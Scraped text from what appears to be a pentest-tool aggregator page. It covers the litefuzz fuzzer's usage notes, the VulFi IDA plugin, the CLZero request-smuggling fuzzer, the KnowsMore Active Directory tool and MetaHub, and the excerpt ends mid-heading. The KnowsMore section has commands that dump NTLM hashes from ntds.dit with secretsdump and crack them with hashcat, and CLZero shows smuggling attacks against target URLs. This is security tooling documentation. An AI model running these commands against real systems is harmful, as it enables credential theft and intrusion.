here enables Guard Malloc heap error checking in order to detect subtle heap corruption bugs
mac note
Some GUI targets may fail to be killed after each iteration's timeout and become unresponsive. To mitigate this, you can run a script that looks like this in another terminal to just periodically kill them in batch to reduce manual effort and monitoring, else the fuzzing process may be affected.
#!/bin/bash
ps -Af | grep -ie "$1" | awk '{print $2}' | xargs kill -9
$ while :; do ./pkill.sh "Process Name /Users/test"; sleep 360; done
/Users/test (example for the first part of the path where temp files are being passed to the local GUI app, FUZZ becomes a path during execution) was chosen as you need a unique string to kill for processes, and if you only use the Process Name, it will kill the fuzzing process as it contains the Process Name too.
enumerating file handlers on Windows
Using the AssocQueryString script with the assoc command can map file extensions to default applications.
C:\> .\AssocQueryString.ps1
...
.hlp :: C:\Windows\winhlp32.exe
.hta :: C:\Windows\SysWOW64\mshta.exe
.htm :: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
.html :: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
.icc :: C:\Windows\system32\colorcpl.exe
.icm :: C:\Windows\system32\colorcpl.exe
.imesx :: C:\Windows\system32\IME\SHARED\imesearch.exe
.img :: C:\Windows\Explorer.exe
.inf :: C:\Windows\system32\NOTEPAD.EXE
.ini :: C:\Windows\system32\NOTEPAD.EXE
.iso :: C:\Windows\Explorer.exe
When fuzzing on Windows, you may want to enable PageHeap and Memory Dumps for a better fuzzing experience (unless your target doesn't like them) prior to starting a new fuzzing run.
sudo litefuzz -l -c "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" -z
sudo litefuzz -l -c "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" --memdump
Yes, run these commands using (g)sudo on Windows to easily elevate to Admin from the console and make the registry changes needed for the features to be enabled. And this also illustrates another nuance for enabling malloc debuggers for targets: on Linux and Mac, we're using runtime environment flags which need to be passed every time to enable this feature. For Windows, we're modifying the registry so once it's passed the first time, one doesn't need to pass -z
or --memdump
in the fuzzing command line again (unless to disable or re-enable them).
fuzz PuTTY (puttygen) (Windows)
litefuzz -l -c "C:\Program Files (x86)\WinSCP\PuTTY\puttygen.exe FUZZ" -i input\ppk -x 0.5 -n 100000 -z
fuzz Adobe Reader like back in the day (Windows GUI)
litefuzz -l -c "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe FUZZ" -i pdfs -x 3 -n 100000 -z
(WinAppDbg only supports python 2, so must use py2 on Windows)
note: reminder that you can enable PageHeap for the target app via -z
in an elevanted prompt or using the installed sudo
for gsudo win32 package that was installed during setup
litefuzz -l -c "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe FUZZ" -z
client
quick look
litefuzz -lk -c "ssh -T test@localhost -p 2222" -a tcp://localhost:2222 -i input/ssh-cli -o crashes/ssh -p -n 250000 -z glibc
--========================--
--======| litefuzz |======--
--========================--
[STATS]
run id: 9404
cmdline: ssh -T test@localhost -p 2222
address: tcp://localhost:2222
crash dir: crashes/ssh
input dir: input/ssh-cli
inputs: 4
iterations: 250000
mutator: random(mutators)
@ 73/250000 (0 crashes, 0 duplicates, ~1 day, 0:21:01 remaining)^C
resume? (y/n)> n
Terminated
...
cat /tmp/litefuzz/out
padding error: need 57895 block 8 mod 7
ssh_dispatch_run_fatal: Connection to 127.0.0.1 port 2222: message authentication code incorrect
local client
fuzz SNMP client on the localhost (Linux)
litefuzz -lk -c "snmpwalk -v 2c -c public localhost:1616 1.3.6.1.2.1.1.1" -a udp://localhost:1616 -i input/snmp/resp.bin -n 1 -d -x 3
remote client
fuzz a remote FTP client (Linux)
while :; do echo "user test\rpass test\rls\rbye\r" | ftp localhost 2121; sleep 1; done
litefuzz -k -i input/ftp/test -a tcp://localhost:2121 -n 100
note: depending on the target, client fuzzing may require listening on a privileged port (1-1024). In this case, on Linux you can either setcap cap_net_bind_service=+ep
on the python interpreter or use sudo when running the fuzzer, on Mac just use sudo and on Windows you can run the fuzzer as Administrator to avoid any Permission Denied errors.
server
quick look
litefuzz -ls -c "./sc_serv shoutcast.conf" -a tcp://localhost:8000 -i input/shoutcast -o crashes/shoutcast -n 1000 -z
--========================--
--======| litefuzz |======--
--========================--
[STATS]
run id: 4001
cmdline: ./sc_serv shoutcast.conf
address: tcp://localhost:8000
crash dir: crashes/shoutcast
input dir: input/shoutcast
inputs: 3
iterations: 1000
mutator: random(mutators)
@ 1000/1000 (1 crashes, 7 duplicates, ~0:00:00 remaining)
[RESULTS]
> completed (1000) iterations with (1) unique crashes and 7 dups
>> check crashes/shoutcast for more details
local server
fuzz a local Shoutcast server
litefuzz -ls -c "./sc_serv shoutcast.conf" -a tcp://localhost:8000 -i input/shoutcast -o crashes/shoutcast -n 1000 -z
remote server
fuzz a remote SMTP server
litefuzz -s -a tcp://10.0.0.11:25 -i input/smtp-req -pp -n 10000
command line
usage: litefuzz.py [-h] [-l] [-k] [-s] [-c CMDLINE] [-i INPUTS] [-n ITERATIONS] [-x MAXTIME] [--mutator MUTATOR] [-a ADDRESS] [-o CRASHDIR] [-t TEMPDIR] [-f FUZZFILE]
[-m MINFILE] [-mm SUPERMIN] [-r REPROFILE] [-e] [-p] [-pp] [-u] [--nofuzz] [--key KEY] [--click] [--tls] [--golang] [--attach ATTACH] [--cmd CMD]
[--rmfile RMFILE] [--reportcrash REPORTCRASH] [--memdump] [--nomemdump] [-z [MALLOC]] [-zz] [-d]
optional arguments:
-h, --help show this help message and exit
-l, --local target will be executed locally
-k, --client target a network client
-s, --server target a network server
-c CMDLINE, --cmdline CMDLINE
target command line
-i INPUTS, --inputs INPUTS
input directory or file
-n ITERATIONS, --iterations ITERATIONS
number of fuzzing iterations (default: 1)
-x MAXTIME, --maxtime MAXTIME
timeout for the run (default: 1)
--mutator MUTATOR, --mutator MUTATOR
timeout for the run (default: 0=random)
-a ADDRESS, --address ADDRESS
server address in the ip:port format
-o CRASHDIR, --crashdir CRASHDIR
specify the directory to output crashes (default: crashes)
-t TEMPDIR, --tempdir TEMPDIR
specify the directory to output runtime fuzzing artifacts (default: OS tmp + run dir)
-f FUZZFILE, --fuzzfile FUZZFILE
specify the path and filename to place the fuzzed file (default: OS tmp + run dir + fuzz_random.ext)
-m MINFILE, --minfile MINFILE
specify a crashing file to generate a minimized version of it (bonus: may also find variant bugs)
-mm SUPERMIN, --supe rmin SUPERMIN
loops minimize to grind on until no more bytes can be removed
-r REPROFILE, --reprofile REPROFILE
specify a crashing file or directory to replay on the target
-e, --reuse enable second round fuzzing where any crashes found are reused as inputs
-p, --multibin use multiple requests or responses as inputs for fuzzing simple binary network sessions
-pp, --multistr use multiple requests or responses within input for fuzzing simple string-based network sessions
-u, --insulate only execute the target once and inside a debugger (eg. interactive clients)
--nofuzz, --nofuzz send input as-is without mutation (useful for debugging)
--key KEY, --key KEY send a particular key every iteration for interactive targets (eg. F5 for refresh)
--click, --click click the mouse (eg. position the cursor over target button to click beforehand)
--tl s, --tls enable TLS for network fuzzing
--golang, --golang enable fuzzing of Golang binaries
--attach ATTACH, --attach ATTACH
attach to a local server process name (mac only)
--cmd CMD, --cmd CMD execute this command after each fuzzing iteration (eg. umount /Volumes/test.dir)
--rmfile RMFILE, --rmfile RMFILE
remove this file after every fuzzing iteration (eg. target won't overwrite output file)
--reportcrash REPORTCRASH, --reportcrash REPORTCRASH
use ReportCrash to help catch crashes for a specified process name (mac only)
--memdump, --memdump enable memory dumps (win32)
--nomemdump, --nomemdump
disable memory dumps (win32)
-z [MALLOC], --malloc [MALLOC]
enable malloc debug helpers (free bugs, but perf cost)
-zz, --nomalloc disable malloc debug helpers (eg. pageheap)
-d, --debug Turn on debug statements
trophies
Litefuzz has fuzzed crashes out of various software packages such as...
- antiword
- AppleScript (OS X)
- ArangoDB VelocyPack
- Avast authenticode-parser
- Avast RetDec
- BBC Audio Waveform
- ColorSync (OS X)
- Dynamsoft BarcodeReader
- eot2ttf
- evernote2md
- faad2
- Facebook's Origami Studio
- FontForge
- ForestDB
- Gifsicle
- GPUJPEG
- GPAC Multimedia Framework
- Google Draco
- GoPro GPR
- GtkRadiant
- IIPImage Server
- John The Ripper
- Kyoto Cabinet
- latex2rtf
- libMeshb
- libembroidery
- libsndfile
- Lion Vector Graphics (lvg)
- L-SMASH
- MindNode
- minimp4
- MiniWeb Server
- MLpack
- Nvidia Data Center GPU Manager
- Numbers (OS X)
- OpenJPEG
- OpenOrienteering Mapper
- OSM Express
- Pages (OS X)
- PBRT-Parser
- Pixar USD
- Remote Apple Events (OS X)
- Samsung rlottie
- Samsung ThorVG
- Shoutcast Server
- Silo
- syslog (OS X)
- Tencent NCNN
- TinyXML2
- UEFITool
- Ulfius Web Framework
- zlib
FAQ
how did this project come about?
Fuzzing is fun! And it's nice to do projects which take a contrarian type of view that fuzzers don't always have to follow the modern or popular approaches to get to the end goal of finding bugs. Whether you're close to bare metal, getting code coverage across all paths or simply optimizing on the fast and flexible, the fundamental "invalidating assumptions" way of doing things, etc. However it manifests, enjoy it.
is this project actively maintained?
Please do not expect active support or maintenance on the project. Feel free to fork it to add new features or fix bugs, etc. Perhaps even do a PR for smaller things, although please do no have no expectations for responses or troubleshooting. It is not intended for development on this repo to be active.
how do you know the fuzzer is working well and did you measure it against others?
The purpose of Litefuzz is to find bugs across platforms. And it does. So, honestly the ability to measure it against fuzzerX or fuzzerY just didn't make the cut. Certain trade-offs were made and acknowledged at inception, see the #intro for more details.
what would you change if you were to re-write it today?
It works pretty well as it is and has been tested on a ton of different targets and scenarios. That being said, it could benefit standardizing on a more modular-based and plugin system where switching between targets and platforms didn't require as many additional checks in the operations side of the code, etc. Of course having more formal tests and a deployment system that would test it across supporting operating systems would create an environment that easier to work across when making changes to core functions. It grew from a small yet amibitious project into something a little bigger pretty quickly.
how stable is litefuzz?
The command line, GUI, network fuzzing (mostly on Linux and Mac), minimization, etc has been tested pretty thoroughly and should be pretty solid overall. Some of the more exotic features such as insulated network GUI fuzzing, ReportCrash support for Mac and some other niche features should be considered experimental.
are there unsupported scenarios for litefuzz?
A few of them, yes. But most are either uncommon scenarios that are buggy, required more time and research to "get right" or just don't quite work for platform related reasons. Many of them are explicitly exit with an "unsupported" message when you try to run it with such options and some caveats have been mentioned in the sections above when describing various features. Some of the more nuanced ones include repro mode on insulated apps isn't supported and also there's been limited testing on Mac apps using the insulate feature, Pyautogui seems to work fine on Linux and Windows but on Mac it didn't prove very reliable so consider it functionally unsupported and client fuzzing on Windows can be a little less reliable than other modes on other platforms.
There may be some edge cases here and there, but the most common local and network fuzzing scenarios have been tested and are working. Ah, these are joys of writing cross-platform tooling: rewarding, but it's hard to make everything work great all the time. Overall, fuzzing on Linux/Mac seems to be more stable and support more features overall, especially as it's had much more testing of network fuzzing than on the Windows platform, but an effort was made for at least the basics to be available on Win32 with a couple extras.
Feel free to fork this fuzzer and make such improvements, support the currently unsupported, etc or PRs for more minor but useful stuff.
what guarentees are given for this project or it's code?
Absolutely none. But it's pretty fun to fuzz and watch it hand you bugs.
author / references
- KitPloit - PenTest & Hacking Tools
- VulFi - Plugin To IDA Pro Which Can Be Used To Assist During Bug Hunting In Binaries
VulFi - Plugin To IDA Pro Which Can Be Used To Assist During Bug Hunting In Binaries
The VulFi (Vulnerability Finder) tool is a plugin to IDA Pro which can be used to assist during bug hunting in binaries. Its main objective is to provide a single view with all cross-references to the most interesting functions (such as strcpy
, sprintf
, system
, etc.). For cases where a Hexrays decompiler can be used, it will attempt to rule out calls to these functions which are not interesting from a vulnerability research perspective (think something like strcpy(dst,"Hello World!")
). Without the decompiler, the rules are much simpler (to not depend on architecture) and thus only rule out the most obvious cases.
Installation
Place the vulfi.py
, vulfi_prototypes.json
and vulfi_rules.json
files in the IDA plugin folder (cp vulfi* <IDA_PLUGIN_FOLDER>
).
Preparing the Database File
Before you run VulFi make sure that you have a good understanding of the binary that you work with. Try to identify all standard functions (strcpy
, memcpy
, etc.) and name them accordingly. The plugin is case insensitive and thus MEMCPY
, Memcpy
and memcpy
are all valid names. However, note that the search for the function requires exact match. This means that memcpy?
or std_memcpy
(or any other variant) will not be detected as a standard function and therefore will not be considered when looking for potential vulnerabilities. If you are working with an unknown binary you need to set the compiler options first Options
> Compiler
. After that VulFi will do its best to filter all obvious false positives (such as call to printf
with constant string as a first parameter). Please note that while the plugin is made without any ties to a specific ar chitecture some processors do not have full support for specifying types and in such case VulFi will simply mark all cross-references to potentially dangerous standard functions to allow you to proceed with manual analysis. In these cases, you can benefit from the tracking features of the plugin.
Usage
Scanning
To initiate the scan, select Search
> VulFi
option from the top bar menu. This will either initiate a new scan, or it will read previous results stored inside the idb
/i64
file. The data are automatically saved whenever you save the database.
Once the scan is completed or once the previous results are loaded a table will be presented with a view containing following columns:
- IssueName - Used as a title for the suspected issue.
- FunctionName - Name of the function.
- FoundIn - The function that contains the potentially interesting reference.
- Address - The address of the detected call.
-
Status - The review status, initial
Not Checked
is assigned to every new item. The other statuses areFalse Positive
,Suspicious
andVulnerable
. Those can be set using a right-click menu on a given item and should reflect the results of the manual review of the given function call. -
Priority - An attempt to prioritize more interesting calls over the less interesting ones. Possible values are
High
,Medium
andLow
. The priorities are defined along with other rules invulfi_rules.json
file. - Comment - A user defined comment for the given item.
In case that there are no data inside the idb
/i64
file or user decides to perform a new scan. The plugin will ask whether it should run the scan using the default included rules or whether it should use a custom rules file. Please note that running a new scan with already existing data does not overwrite the previously found items identified by the rule with the same name as the one with previously stored results. Therefore, running the scan again does not delete existing comments and status updates.
In the right-click context menu within the VulFi view, you can also remove the item from the results or remove all items. Please note that any comments or status updates will be lost after performing this operation.
Investigation
Whenever you would like to inspect the detected instance of a possible vulnerable function, just double-click anywhere in the desired row and IDA will take you to the memory location which was identified as potentially interesting. Using a right-click and option Set Vulfi Comment
allows you to enter comment for the given instance (to justify the status for example).
Adding More Functions
The plugin also allows for creating custom rules. These rules could be defined in the IDA interface (ideal for single functions) or supplied as a custom rule file (ideal for rules that aim to cover multiple functions).
Within the Interface
When you would like to trace a custom function, which was identified during the analysis, just switch the IDA View to that function, right-click anywhere within its body and select Add current function to VulFi
.
Custom Set of Rules
It is also possible to load a custom file with set of multiple rules. To create a custom rule file with the below structure you can use the included template file here.
[ // An array of rules
{
"name": "RULE NAME", // The name of the rule
"alt_names":[
"function_name_to_look_for" // List of all function names that should be matched against the conditions defined in this rule
],
"wrappers":true, // Look for wrappers of the above functions as well (note that the wrapped function has to also match the rule)
"mark_if":{
"High":"True", // If evaluates to True, mark with priority High (see Rules below)
"Medium":"False", // If evaluates to True, mark with priority Medium (see Rules below)
"Low": "False" // If evaluates to True, mark with priority Low (see Rules below)
}
}
]
An example rule that looks for all cross-references to function malloc
and checks whether its paramter is not constant and whether the return value of the function is checked is shown below:
{
"name": "Possible Null Pointer Dereference",
"alt_names":[
"malloc",
"_malloc",
".malloc"
],
"wrappers":false,
"mark_if":{
"High":"not param[0].is_constant() and not function_call.return_value_checked()",
"Medium":"False",
"Low": "False"
}
}
Rules
Available Variables
-
param[<index>]
: Used to access the parameter to a function call (index starts at0
) -
function_call
: Used to access the function call event -
param_count
: Holds the count of parameters that were passed to a function
Available Functions
- Is parameter a constant:
param[<index>].is_constant()
- Get numeric value of parameter:
param[<index>].number_value()
- Get string value of parameter:
param[<index>].string_value()
- Is parameter set to null after the call:
param[<index>].set_to_null_after_call()
- Is return value of a function checked:
function_call.return_value_checked(<constant_to_check>)
Examples
- Mark all calls to a function where third parameter is > 5:
param[2].number_value() > 5
- Mark all calls to a function where the second parameter contains "%s":
"%s" in param[1].string_value()
- Mark all calls to a function where the second parameter is not constant:
not param[1].is_constant()
- Mark all calls to a function where the return value is validated against the value that is equal to the number of parameters:
function_call.return_value_checked(param_count)
- Mark all calls to a function where the return value is validated against any value:
function_call.return_value_checked()
- Mark all calls to a function where none of the parameters starting from the third are constants:
all(not p.is_constant() for p in param[2:])
- Mark all calls to a function where any of the parameters are constant:
any(p.is_constant() for p in param)
- Mark all calls to a function:
True
Issues and Warnings
- When you request the parameter with index that is out of bounds any call to a function will be marked as
Low
priority. This is a way to avoid missing cross references where it was not possible to correctly get all parameters (this mainly applies to disassembly mode). - When you search within the VulFi view and change context out of the view and come back, the view will not load. You can solve this either by terminating the search operation before switching the context, moving the VulFi view to the side-view so that it is always visible or by closing and re-opening the view (no data will be lost).
- Scans for more exotic architectures end with a lot of false positives.
Socialscan – Command-Line Tool To Check For Email And Social Media Username Usage
APT-Hunter – Threat Hunting Tool via Windows Event Log
Grype – Vulnerability Scanner For Container Images & Filesystems
LibInjection – Detect SQL Injection (SQLi) and Cross-Site Scripting (XSS)
Vulhub – Pre-Built Vulnerable Docker Environments For Learning To Hack
Aclpwn.Py – Exploit ACL Based Privilege Escalation Paths in Active Directory
Karkinos – Beginner Friendly Penetration Testing Tool
assetfinder – Find Related Domains and Subdomains
CredNinja – Test Credential Validity of Dumped Credentials or Hashes
CFRipper – CloudFormation Security Scanning & Audit Tool
Socialscan – Command-Line Tool To Check For Email And Social Media Username Usage
HardCIDR – Network CIDR and Range Discovery Tool
Pwnagotchi – Maximize Crackable WPA Key Material For Bettercap
DataSurgeon – Extract Sensitive Information (PII) From Logs
Privacy Implications of Web 3.0 and Darknets
padre – Padding Oracle Attack Exploiter Tool
AgentSmith HIDS – Host Based Intrusion Detection
- KitPloit - PenTest & Hacking Tools
- CLZero - A Project For Fuzzing HTTP/1.1 CL.0 Request Smuggling Attack Vectors
CLZero - A Project For Fuzzing HTTP/1.1 CL.0 Request Smuggling Attack Vectors
A project for fuzzing HTTP/1.1 CL.0 Request Smuggling Attack Vectors.
About
Thank you to @albinowax, @defparam and @d3d else this tool would not exist. Inspired by the tool Smuggler all attack gadgets adapted from Smuggler and https://portswigger.net/research/how-to-turn-security-research-into-profit
For more info see: https://moopinger.github.io/blog/fuzzing/clzero/tools/request/smuggling/2023/11/15/Fuzzing-With-CLZero.html
Usage
usage: clzero.py [-h] [-url URL] [-file FILE] [-index INDEX] [-verbose] [-no-color] [-resume] [-skipread] [-quiet] [-lb] [-config CONFIG] [-method METHOD]
CLZero by Moopinger
optional arguments:
-h, --help show this help message and exit
-url URL (-u), Single target URL.
-file FILE (-f), Files containing multiple targets.
-index INDEX (-i), Index start point when using a file list. Default is first line.
-verbose (-v), Enable verbose output.
-no-color Disable colors in HTTP Status
-resume Resume scan from last index place.
-skipread Skip the read response on smuggle requests, recommended. This will save a lot of time between requests. Ideal for targets with standard HTTP traffic.
-quiet (-q), Disable output. Only successful payloads will be written to ./payloads/
-lb Last byte sync method for least request latency. Due to th e nature of the request, it cannot guarantee that the smuggle request will be processed first. Ideal for targets with a high
amount of traffic, and you do not mind sending multiple requests.
-config CONFIG (-c) Config file to load, see ./configs/ to create custom payloads
-method METHOD (-m) Method to use when sending the smuggle request. Default: POST
single target attack:
-
python3 clzero.py -u https://www.target.com/ -c configs/default.py -skipread
-
python3 clzero.py -u https://www.target.com/ -c configs/default.py -lb
Multi target attack:
-
python3 clzero.py -l urls.txt -c configs/default.py -skipread
-
python3 clzero.py -l urls.txt -c configs/default.py -lb
Install
git clone https://github.com/Moopinger/CLZero.git
cd CLZero
pip3 install -r requirements.txt
- KitPloit - PenTest & Hacking Tools
- KnowsMore - A Swiss Army Knife Tool For Pentesting Microsoft Active Directory (NTLM Hashes, BloodHound, NTDS And DCSync)
KnowsMore - A Swiss Army Knife Tool For Pentesting Microsoft Active Directory (NTLM Hashes, BloodHound, NTDS And DCSync)
KnowsMore officially supports Python 3.8+.
Main features
- Import NTLM Hashes from .ntds output txt file (generated by CrackMapExec or secretsdump.py)
- Import NTLM Hashes from NTDS.dit and SYSTEM
- Import Cracked NTLM hashes from hashcat output file
- Import BloodHound ZIP or JSON file
- BloodHound importer (import JSON to Neo4J without BloodHound UI)
- Analyse the quality of password (length , lower case, upper case, digit, special and latin)
- Analyse similarity of password with company and user name
- Search for users, passwords and hashes
- Export all cracked credentials direct to BloodHound Neo4j Database as 'owned object'
- Other amazing features...
Getting stats
knowsmore --stats
This command will produce several statistics about the passwords like the output bellow
KnowsMore v0.1.4 by Helvio Junior
Active Directory, BloodHound, NTDS hashes and Password Cracks correlation tool
https://github.com/helviojunior/knowsmore
[+] Startup parameters
command line: knowsmore --stats
module: stats
database file: knowsmore.db
[+] start time 2023-01-11 03:59:20
[?] General Statistics
+-------+----------------+-------+
| top | description | qty |
|-------+----------------+-------|
| 1 | Total Users | 95369 |
| 2 | Unique Hashes | 74299 |
| 3 | Cracked Hashes | 23177 |
| 4 | Cracked Users | 35078 |
+-------+----------------+-------+
[?] General Top 10 passwords
+-------+-------------+-------+
| top | password | qty |
|-------+-------------+-------|
| 1 | password | 1111 |
| 2 | 123456 | 824 |
| 3 | 123456789 | 815 |
| 4 | guest | 553 |
| 5 | qwerty | 329 |
| 6 | 12345678 | 277 |
| 7 | 111111 | 268 |
| 8 | 12345 | 202 |
| 9 | secret | 170 |
| 10 | sec4us | 165 |
+-------+-------------+-------+
[?] Top 10 weak passwords by company name similarity
+-------+--------------+---------+----------------------+-------+
| top | password | score | company_similarity | qty |
|-------+--------------+---------+----------------------+-------|
| 1 | company123 | 7024 | 80 | 1111 |
| 2 | Company123 | 5209 | 80 | 824 |
| 3 | company | 3674 | 100 | 553 |
| 4 | Company@10 | 2080 | 80 | 329 |
| 5 | company10 | 1722 | 86 | 268 |
| 6 | Company@2022 | 1242 | 71 | 202 |
| 7 | Company@2024 | 1015 | 71 | 165 |
| 8 | Company2022 | 978 | 75 | 157 |
| 9 | Company10 | 745 | 86 | 116 |
| 10 | Company21 | 707 | 86 | 110 |
+-------+--------------+---------+----------------------+-------+
Installation
Simple
pip3 install --upgrade knowsmore
Note: If you face problem with dependency version Check the Virtual ENV file
Execution Flow
There is no an obligation order to import data, but to get better correlation data we suggest the following execution flow:
- Create database file
- Import BloodHound files
- Domains
- GPOs
- OUs
- Groups
- Computers
- Users
- Import NTDS file
- Import cracked hashes
Create database file
All data are stored in a SQLite Database
knowsmore --create-db
Importing BloodHound files
We can import all full BloodHound files into KnowsMore, correlate data, and sync it to Neo4J BloodHound Database. So you can use only KnowsMore to import JSON files directly into Neo4j database instead of use extremely slow BloodHound User Interface
# Bloodhound ZIP File
knowsmore --bloodhound --import-data ~/Desktop/client.zip
# Bloodhound JSON File
knowsmore --bloodhound --import-data ~/Desktop/20220912105336_users.json
Note: The KnowsMore is capable to import BloodHound ZIP File and JSON files, but we recommend to use ZIP file, because the KnowsMore will automatically order the files to better data correlation.
Sync data to Neo4j BloodHound database
# Bloodhound ZIP File
knowsmore --bloodhound --sync 10.10.10.10:7687 -d neo4j -u neo4j -p 12345678
Note: The KnowsMore implementation of bloodhount-importer was inpired from Fox-It BloodHound Import implementation. We implemented several changes to save all data in KnowsMore SQLite database and after that do an incremental sync to Neo4J database. With this strategy we have several benefits such as at least 10x faster them original BloodHound User interface.
Importing NTDS file
Option 1
Note: Import hashes and clear-text passwords directly from NTDS.dit and SYSTEM registry
knowsmore --secrets-dump -target LOCAL -ntds ~/Desktop/ntds.dit -system ~/Desktop/SYSTEM
Option 2
Note: First use the secretsdump to extract ntds hashes with the command bellow
secretsdump.py -ntds ntds.dit -system system.reg -hashes lmhash:ntlmhash LOCAL -outputfile ~/Desktop/client_name
After that import
knowsmore --ntlm-hash --import-ntds ~/Desktop/client_name.ntds
Generating a custom wordlist
knowsmore --word-list -o "~/Desktop/Wordlist/my_custom_wordlist.txt" --batch --name company_name
Importing cracked hashes
Cracking hashes
First extract all hashes to a txt file
# Extract NTLM hashes to file
nowsmore --ntlm-hash --export-hashes "~/Desktop/ntlm_hash.txt"
# Or, extract NTLM hashes from NTDS file
cat ~/Desktop/client_name.ntds | cut -d ':' -f4 > ntlm_hashes.txt
In order to crack the hashes, I usually use hashcat
with the command bellow
# Wordlist attack
hashcat -m 1000 -a 0 -O -o "~/Desktop/cracked.txt" --remove "~/Desktop/ntlm_hash.txt" "~/Desktop/Wordlist/*"
# Mask attack
hashcat -m 1000 -a 3 -O --increment --increment-min 4 -o "~/Desktop/cracked.txt" --remove "~/Desktop/ntlm_hash.txt" ?a?a?a?a?a?a?a?a
importing hashcat output file
knowsmore --ntlm-hash --company clientCompanyName --import-cracked ~/Desktop/cracked.txt
Note: Change clientCompanyName to name of your company
Wipe sensitive data
As the passwords and his hashes are extremely sensitive data, there is a module to replace the clear text passwords and respective hashes.
Note: This command will keep all generated statistics and imported user data.
knowsmore --wipe
BloodHound Mark as owned
One User
During the assessment you can find (in a several ways) users password, so you can add this to the Knowsmore database
knowsmore --user-pass --username administrator --password Sec4US@2023
# or adding the company name
knowsmore --user-pass --username administrator --password Sec4US@2023 --company sec4us
Integrate all credentials cracked to Neo4j Bloodhound database
knowsmore --bloodhound --mark-owned 10.10.10.10 -d neo4j -u neo4j -p 123456
To remote connection make sure that Neo4j database server is accepting remote connection. Change the line bellow at the config file /etc/neo4j/neo4j.conf and restart the service.
server.bolt.listen_address=0.0.0.0:7687
- KitPloit - PenTest & Hacking Tools
- Metahub - An Automated Contextual Security Findings Enrichment And Impact Evaluation Tool For Vulnerability Management
Metahub - An Automated Contextual Security Findings Enrichment And Impact Evaluation Tool For Vulnerability Management
MetaHub is an automated contextual security findings enrichment and impact evaluation tool for vulnerability management. You can use it with AWS Security Hub or any ASFF-compatible security scanner. Stop relying on useless severities and switch to impact scoring definitions based on YOUR context.
MetaHub is an open-source security tool for impact-contextual vulnerability management. It can automate the process of contextualizing security findings based on your environment and your needs: YOUR context, identifying ownership, and calculate an impact scoring based on it that you can use for defining prioritization and automation. You can use it with AWS Security Hub or any ASFF security scanners (like Prowler).
MetaHub describe your context by connecting to your affected resources in your affected accounts. It can describe information about your AWS account and organization, the affected resources tags, the affected CloudTrail events, your affected resource configurations, and all their associations: if you are contextualizing a security finding affecting an EC2 Instance, MetaHub will not only connect to that instance itself but also its IAM Roles; from there, it will connect to the IAM Policies associated with those roles. It will connect to the Security Groups and analyze all their rules, the VPC and the Subnets where the instance is running, the Volumes, the Auto Scaling Groups, and more.
After fetching all the information from your context, MetaHub will evaluate certain important conditions for all your resources: exposure
, access
, encryption
, status
, environment
and application
. Based on those calculations and in addition to the information from the security findings affecting the resource all together, MetaHub will generate a Scoring for each finding.
Check the following dashboard generated by MetaHub. You have the affected resources, grouping all the security findings affecting them together and the original severity of the finding. After that, you have the Impact Score and all the criteria MetaHub evaluated to generate that score. All this information is filterable, sortable, groupable, downloadable, and customizable.
You can rely on this Impact Score for prioritizing findings (where should you start?), directing attention to critical issues, and automating alerts and escalations.
MetaHub can also filter, deduplicate, group, report, suppress, or update your security findings in automated workflows. It is designed for use as a CLI tool or within automated workflows, such as AWS Security Hub custom actions or AWS Lambda functions.
The following is the JSON output for a an EC2 instance; see how MetaHub organizes all the information about its context together, under associations
, config
, tags
, account
cloudtrail
, and impact
Context
In MetaHub, context refers to information about the affected resources like their configuration, associations, logs, tags, account, and more.
MetaHub doesn't stop at the affected resource but analyzes any associated or attached resources. For instance, if there is a security finding on an EC2 instance, MetaHub will not only analyze the instance but also the security groups attached to it, including their rules. MetaHub will examine the IAM roles that the affected resource is using and the policies attached to those roles for any issues. It will analyze the EBS attached to the instance and determine if they are encrypted. It will also analyze the Auto Scaling Groups that the instance is associated with and how. MetaHub will also analyze the VPC, Subnets, and other resources associated with the instance.
The Context module has the capability to retrieve information from the affected resources, affected accounts, and every associated resources. The context module has five main parts: config
(which includes associations
as well), tags
, cloudtrail
, and account
. By default config
and tags
are enabled, but you can change this behavior using the option --context
(for enabling all the context modules you can use --context config tags cloudtrail account
). The output of each enabled key will be added under the affected resource.
Config
Under the config
key, you can find anyting related to the configuration of the affected resource. For example, if the affected resource is an EC2 Instance, you will see keys like private_ip
, public_ip
, or instance_profile
.
You can filter your findings based on Config outputs using the option: --mh-filters-config <key> {True/False}
. See Config Filtering.
Associations
Under the associations
key, you will find all the associated resources of the affected resource. For example, if the affected resource is an EC2 Instance, you will find resources like: Security Groups, IAM Roles, Volumes, VPC, Subnets, Auto Scaling Groups, etc. Each time MetaHub finds an association, it will connect to the associated resource again and fetch its own context.
Associations are key to understanding the context and impact of your security findings as their exposure.
You can filter your findings based on Associations outputs using the option: --mh-filters-config <key> {True/False}
. See Config Filtering.
Tags
MetaHub relies on AWS Resource Groups Tagging API to query the tags associated with your resources.
Note that not all AWS resource type supports this API. You can check supported services.
Tags are a crucial part of understanding your context. Tagging strategies often include:
- Environment (like Production, Staging, Development, etc.)
- Data classification (like Confidential, Restricted, etc.)
- Owner (like a team, a squad, a business unit, etc.)
- Compliance (like PCI, SOX, etc.)
If you follow a proper tagging strategy, you can filter and generate interesting outputs. For example, you could list all findings related to a specific team and provide that data directly to that team.
You can filter your findings based on Tags outputs using the option: --mh-filters-tags TAG=VALUE
. See Tags Filtering
CloudTrail
Under the key cloudtrail
, you will find critical Cloudtrail events related to the affected resource, such as creating events.
The Cloudtrail events that we look for are defined by resource type, and you can add, remove or change them by editing the configuration file resources.py.
For example for an affected resource of type Security Group, MetaHub will look for the following events:
CreateSecurityGroup
: Security Group Creation eventAuthorizeSecurityGroupIngress
: Security Group Rule Authorization event.
Account
Under the key account
, you will find information about the account where the affected resource is runnning, like if it's part of an AWS Organizations, information about their contacts, etc.
Ownership
MetaHub also focuses on ownership detection. It can determine the owner of the affected resource in various ways. This information can be used to automatically assign a security finding to the correct owner, escalate it, or make decisions based on this information.
An automated way to determine the owner of a resource is critical for security teams. It allows them to focus on the most critical issues and escalate them to the right people in automated workflows. But automating workflows this way, it is only viable if you have a reliable way to define the impact of a finding, which is why MetaHub also focuses on impact.
Impact
